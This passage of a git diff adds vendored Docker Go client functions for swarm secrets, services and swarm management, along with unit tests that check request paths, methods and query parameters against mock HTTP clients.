b/vendor/github.com/docker/docker/client/secret_update.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" 
+) + +// SecretUpdate updates a Secret. Currently, the only part of a secret spec +// which can be updated is Labels. +func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go new file mode 100644 index 0000000000..c620985bd5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSecretUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretUpdate(t *testing.T) { + expectedURL := "/secrets/secret_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + if err != nil { + t.Fatal(err) + } +} diff 
--git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go new file mode 100644 index 0000000000..3d1be225bd --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_create.go @@ -0,0 +1,30 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceCreate creates a new Service. +func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) { + var headers map[string][]string + + if options.EncodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {options.EncodedRegistryAuth}, + } + } + + var response types.ServiceCreateResponse + resp, err := cli.post(ctx, "/services/create", nil, service, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go new file mode 100644 index 0000000000..1e07382870 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_create_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func 
TestServiceCreate(t *testing.T) { + expectedURL := "/services/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go new file mode 100644 index 0000000000..ca71cbde1a --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceInspectWithRaw returns the service information and the raw data. 
+func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) { + serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Service{}, nil, serviceNotFoundError{serviceID} + } + return swarm.Service{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Service{}, nil, err + } + + var response swarm.Service + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go new file mode 100644 index 0000000000..e235cf0fef --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceInspectServiceNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrServiceNotFound(err) { + t.Fatalf("expected an serviceNotFoundError error, got %v", err) + } +} + +func TestServiceInspect(t *testing.T) { + expectedURL := "/services/service_id" + client := &Client{ + client: newMockClient(func(req 
*http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Service{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id") + if err != nil { + t.Fatal(err) + } + if serviceInspect.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", serviceInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go new file mode 100644 index 0000000000..c29e6d407d --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceList returns the list of services. 
+func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/services", query, nil) + if err != nil { + return nil, err + } + + var services []swarm.Service + err = json.NewDecoder(resp.body).Decode(&services) + ensureReaderClosed(resp) + return services, err +} diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go new file mode 100644 index 0000000000..213981ef70 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceList(t *testing.T) { + expectedURL := "/services" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.ServiceListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ServiceListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.ServiceListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": 
`{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Service{ + { + ID: "service_id1", + }, + { + ID: "service_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + services, err := client.ServiceList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(services) != 2 { + t.Fatalf("expected 2 services, got %v", services) + } + } +} diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go new file mode 100644 index 0000000000..24384e3ec0 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_logs.go @@ -0,0 +1,52 @@ +package client + +import ( + "io" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// ServiceLogs returns the logs generated by a service in an io.ReadCloser. +// It's up to the caller to close the stream. 
+func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/services/"+serviceID+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go new file mode 100644 index 0000000000..a6d002ba75 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_logs_test.go @@ -0,0 +1,133 @@ +package client + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "log" + "net/http" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestServiceLogsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + _, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{ + Since: "2006-01-02TZ", + }) + if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { + t.Fatalf("expected a 'parsing time' error, got %v", err) + } +} + +func TestServiceLogs(t *testing.T) { + expectedURL := 
"/services/service_id/logs" + cases := []struct { + options types.ContainerLogsOptions + expectedQueryParams map[string]string + }{ + { + expectedQueryParams: map[string]string{ + "tail": "", + }, + }, + { + options: types.ContainerLogsOptions{ + Tail: "any", + }, + expectedQueryParams: map[string]string{ + "tail": "any", + }, + }, + { + options: types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Timestamps: true, + Details: true, + Follow: true, + }, + expectedQueryParams: map[string]string{ + "tail": "", + "stdout": "1", + "stderr": "1", + "timestamps": "1", + "details": "1", + "follow": "1", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date, timestamp or go duration will be + // passed as is + Since: "invalid but valid", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "invalid but valid", + }, + }, + } + for _, logCase := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check query parameters + query := r.URL.Query() + for key, expected := range logCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options) + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} + +func ExampleClient_ServiceLogs_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + reader, err := client.ServiceLogs(ctx, "service_id", types.ContainerLogsOptions{}) + if err != nil { + log.Fatal(err) + } + + _, err = io.Copy(os.Stdout, reader) + if err != nil && err != io.EOF { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go new file mode 100644 index 0000000000..a9331f92c2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ServiceRemove kills and removes a service. 
+func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error { + resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go new file mode 100644 index 0000000000..8e2ac259c1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestServiceRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ServiceRemove(context.Background(), "service_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceRemove(t *testing.T) { + expectedURL := "/services/service_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ServiceRemove(context.Background(), "service_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go new file mode 100644 index 0000000000..afa94d47e2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_update.go @@ -0,0 +1,41 @@ +package client + +import ( + "encoding/json" + "net/url" + "strconv" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceUpdate updates a Service. +func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) { + var ( + headers map[string][]string + query = url.Values{} + ) + + if options.EncodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {options.EncodedRegistryAuth}, + } + } + + if options.RegistryAuthFrom != "" { + query.Set("registryAuthFrom", options.RegistryAuthFrom) + } + + query.Set("version", strconv.FormatUint(version.Index, 10)) + + var response types.ServiceUpdateResponse + resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go new file mode 100644 index 0000000000..76bea176bf --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_update_test.go @@ -0,0 +1,77 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" +) + +func TestServiceUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ServiceUpdate(context.Background(), "service_id", swarm.Version{}, swarm.ServiceSpec{}, types.ServiceUpdateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceUpdate(t *testing.T) { + expectedURL := 
"/services/service_id/update" + + updateCases := []struct { + swarmVersion swarm.Version + expectedVersion string + }{ + { + expectedVersion: "0", + }, + { + swarmVersion: swarm.Version{ + Index: 0, + }, + expectedVersion: "0", + }, + { + swarmVersion: swarm.Version{ + Index: 10, + }, + expectedVersion: "10", + }, + } + + for _, updateCase := range updateCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + version := req.URL.Query().Get("version") + if version != updateCase.expectedVersion { + return nil, fmt.Errorf("version not set in URL query properly, expected '%s', got %s", updateCase.expectedVersion, version) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("{}"))), + }, nil + }), + } + + _, err := client.ServiceUpdate(context.Background(), "service_id", updateCase.swarmVersion, swarm.ServiceSpec{}, types.ServiceUpdateOptions{}) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go new file mode 100644 index 0000000000..be28d32628 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// SwarmGetUnlockKey retrieves the swarm's unlock key. 
+func (cli *Client) SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error) { + serverResp, err := cli.get(ctx, "/swarm/unlockkey", nil, nil) + if err != nil { + return types.SwarmUnlockKeyResponse{}, err + } + + var response types.SwarmUnlockKeyResponse + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go new file mode 100644 index 0000000000..fd45d066e3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_init.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmInit initializes the Swarm. +func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) { + serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil) + if err != nil { + return "", err + } + + var response string + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go new file mode 100644 index 0000000000..811155aff4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_init_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmInitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmInit(context.Background(), swarm.InitRequest{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmInit(t 
*testing.T) { + expectedURL := "/swarm/init" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(`"body"`))), + }, nil + }), + } + + resp, err := client.SwarmInit(context.Background(), swarm.InitRequest{ + ListenAddr: "0.0.0.0:2377", + }) + if err != nil { + t.Fatal(err) + } + if resp != "body" { + t.Fatalf("Expected 'body', got %s", resp) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go new file mode 100644 index 0000000000..6d95cfc05e --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_inspect.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmInspect inspects the Swarm. 
+func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) { + serverResp, err := cli.get(ctx, "/swarm", nil, nil) + if err != nil { + return swarm.Swarm{}, err + } + + var response swarm.Swarm + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go new file mode 100644 index 0000000000..6432d172b4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go @@ -0,0 +1,56 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSwarmInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmInspect(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmInspect(t *testing.T) { + expectedURL := "/swarm" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Swarm{ + ClusterInfo: swarm.ClusterInfo{ + ID: "swarm_id", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + swarmInspect, err := client.SwarmInspect(context.Background()) + if err != nil { + t.Fatal(err) + } + if swarmInspect.ID != "swarm_id" { + t.Fatalf("expected `swarm_id`, got %s", swarmInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_join.go 
b/vendor/github.com/docker/docker/client/swarm_join.go new file mode 100644 index 0000000000..cda99930eb --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_join.go @@ -0,0 +1,13 @@ +package client + +import ( + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmJoin joins the Swarm. +func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error { + resp, err := cli.post(ctx, "/swarm/join", nil, req, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go new file mode 100644 index 0000000000..31ef2a76ee --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_join_test.go @@ -0,0 +1,51 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmJoinError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmJoin(t *testing.T) { + expectedURL := "/swarm/join" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: "0.0.0.0:2377", + }) + if err != nil { + t.Fatal(err) + 
} +} diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go new file mode 100644 index 0000000000..a4df732174 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_leave.go @@ -0,0 +1,18 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// SwarmLeave leaves the Swarm. +func (cli *Client) SwarmLeave(ctx context.Context, force bool) error { + query := url.Values{} + if force { + query.Set("force", "1") + } + resp, err := cli.post(ctx, "/swarm/leave", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go new file mode 100644 index 0000000000..c96dac8120 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go @@ -0,0 +1,66 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestSwarmLeaveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmLeave(context.Background(), false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmLeave(t *testing.T) { + expectedURL := "/swarm/leave" + + leaveCases := []struct { + force bool + expectedForce string + }{ + { + expectedForce: "", + }, + { + force: true, + expectedForce: "1", + }, + } + + for _, leaveCase := range leaveCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + force := 
req.URL.Query().Get("force") + if force != leaveCase.expectedForce { + return nil, fmt.Errorf("force not set in URL query properly. expected '%s', got %s", leaveCase.expectedForce, force) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmLeave(context.Background(), leaveCase.force) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go new file mode 100644 index 0000000000..addfb59f0a --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_unlock.go @@ -0,0 +1,17 @@ +package client + +import ( + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmUnlock unlockes locked swarm. +func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error { + serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil) + if err != nil { + return err + } + + ensureReaderClosed(serverResp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go new file mode 100644 index 0000000000..cc8eeb6554 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_update.go @@ -0,0 +1,22 @@ +package client + +import ( + "fmt" + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmUpdate updates the Swarm. 
